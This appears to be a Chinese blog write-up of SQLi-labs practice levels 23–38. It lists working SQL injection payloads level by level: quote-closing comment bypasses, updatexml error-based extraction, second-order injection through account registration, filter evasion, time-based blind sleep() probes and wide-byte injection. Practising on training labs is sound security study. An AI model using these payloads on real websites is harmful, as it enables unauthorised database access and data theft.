less-23:需要绕过注释符,本来我的想法是用16进制或者asc码甚至数值10进制转字符方式的,但都失败了,不知道是不是打开方式不对,这里求大佬指点;最后从网上找到资料https://www.xjx100.cn/news/160117.html?action=onClick,使用1‘ or ’1‘=’1闭合引号方式绕过;按照这个闭合最终引号思路,使用1’ or updatexml(1,concat(0x7e,(database()),0x7e),0) or ‘1‘=’1来报错显示
less-24:主页面是登录,点击忘记密码让自己先办法,还有个注册页面,注册已有账户会有对应提示;尝试早用户名后面加单引号看会不会报错,结果没报错,注册成功了;于是用已有账户Dumb’–注册一个空密码账户,接着用Dumb‘与密码就能登录了Dump账户
less-25:从头开始1’–正常回显;and和or都被过滤了,还好||没被过滤,使用’|| 1=1–+可以继续注入
less-25a:通过使用999%20||%201=2–+与999%20||%201=1–+看到不同回显,可以判断存在注入点
less-26:好像空格注释被过滤了,and和or可以复写绕过不过想了很久,还是决定使用不用空格不用注释的方法1’||updatexml(1,concat(0x7e,(database()),0x7e),0)||’
less-26a:还按照上一道题来,结果没有报错输出;嗯。。。随机删几个字符,不报错;使用sleep试试继续用()代替空格,1’)and(if(length(database())=0,NULL,sleep(10)))and(‘1’=‘1可以
less-27:继续按照上一道题来,结果报错了,才发现实际正常情况下1’and(if(length(database())=0,NULL,sleep(10)))and‘1’=‘1两端有引号的部分是不用带括号的。。。
less-27a:跟上一道题类似,单引号变成双引号1"and(if(length(database())=0,NULL,sleep(10)))and"1"="1
less-28:1’and’1’=‘1和1’and’1’=‘2有不同回显,1’and(if(length(database())=0,NULL,sleep(10)))and‘1’=‘1这个继续可以过,但是时间很长,改成0.1,发现居然被拉伸成了25倍,不知道哪位大佬能帮助解惑。。。
less-28a:同上
less-29:1’ and 1=1 --+和1’ and 1=2 --+有不同的回显,1‘ and if(length(database())=0,NULL,sleep(10))–+可以
less-30:按照上一道题答的案1" and if(length(database())=8,NULL,sleep(10))–+数据库长度8位
less-31:按照上一题,1" and if(length(database())=9,NULL,sleep(10))–+会报错,从头来,发现需要加一个括号,然后在上一道题答案中加上括号1") and if(length(database())=9,NULL,sleep(10))–+就可以了
less-32:宽字节注入,運‘ or 1=1 --+和運’ or 1=2 --+有不同回显
less-33:同上
less-34:抓包,運’or 1=2–+和運’or 1=1–+回显不同
less-35:999 union select 1,2,3开始的时候一直报错,后来想想可能是一直做字符型,现在换成数值型不习惯了
less-36:運‘ and 1=1–+和運‘ and 1=2–+回显不同,可以配合sleep()
less-37:抓包uname=Dumb運’ or if(length(database())=9,NULL,sleep(1))可以
less-38:1’ and if(length(database())=9,NULL,sleep(5))–+可以过;不过看了资料才知道,这关是可以多语句堆叠执行的
靶场练习-SQLilabs-Adv
最新推荐文章于 2024-04-28 16:28:02 发布